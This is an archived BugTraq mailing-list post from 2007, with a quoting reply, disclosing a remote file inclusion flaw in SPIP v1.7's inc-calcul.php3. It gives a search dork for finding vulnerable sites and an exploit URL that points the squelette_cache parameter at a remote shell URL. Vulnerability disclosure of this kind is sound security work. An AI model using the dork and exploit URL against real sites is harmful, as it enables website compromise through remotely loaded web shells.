BugTraq
Back to list
|
Post reply
SPIP v1.7 Remote File Inclusion Bug
Aug 23 2007 10:04AM
system-errrror hotmail com
(1 replies)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++
+++++++ SPIP v1.7 Remote File Inclusion Bug ! ++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++
------------------------------------------------------------------------
------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++
++
++DORK : "/SPIP-v1-7-2/"
++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++
+-----------------------------------------------------------------------
-----------+
+-----------------------------------------------------------------------
-----------+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++
++
++ Bug in : "SPIP-v1-7r/inc-calcul.php3"
++----------------------------------------------------------------------
------------
++ Vlu Code: -----------------------------
++ || include($squelette_cache); ||
++ -----------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++
++
++======================================================================
============
++ Exploit :
++
++ http://sitename.com/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=http://S
HELLURL?
++
++======================================================================
============
++
+++++++++++++++++++++|Discoverd By :Darkdewil[system-errrror]|++++++++++++++++++++++
++ ++
++++++++++++++++++|Conatact : system-errrror[at]hotmail[dot]com |+++++++++++++++++++
++ ++
++++++++++++|Thx To :Cazanova & fedaiturk & n3twork & codes & by_Ka0s |+++++++++++++
++ ++
++++++++++++++++++++++++|sPECial THanks to :1923turk - grup|++++++++++++++++++++++++
++ ++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++
[ reply ]
Re: SPIP v1.7 Remote File Inclusion Bug
Aug 24 2007 07:57PM
Magnus Holmgren (holmgren lysator liu se)
Privacy Statement
Copyright 2010, SecurityFocus
++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++
+++++++ SPIP v1.7 Remote File Inclusion Bug ! ++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++
------------------------------------------------------------------------
------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++
++
++DORK : "/SPIP-v1-7-2/"
++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++
+-----------------------------------------------------------------------
-----------+
+-----------------------------------------------------------------------
-----------+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++
++
++ Bug in : "SPIP-v1-7r/inc-calcul.php3"
++----------------------------------------------------------------------
------------
++ Vlu Code: -----------------------------
++ || include($squelette_cache); ||
++ -----------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++
++
++======================================================================
============
++ Exploit :
++
++ http://sitename.com/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=http://S
HELLURL?
++
++======================================================================
============
++
+++++++++++++++++++++|Discoverd By :Darkdewil[system-errrror]|++++++++++++++++++++++
++ ++
++++++++++++++++++|Conatact : system-errrror[at]hotmail[dot]com |+++++++++++++++++++
++ ++
++++++++++++|Thx To :Cazanova & fedaiturk & n3twork & codes & by_Ka0s |+++++++++++++
++ ++
++++++++++++++++++++++++|sPECial THanks to :1923turk - grup|++++++++++++++++++++++++
++ ++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++
[ reply ]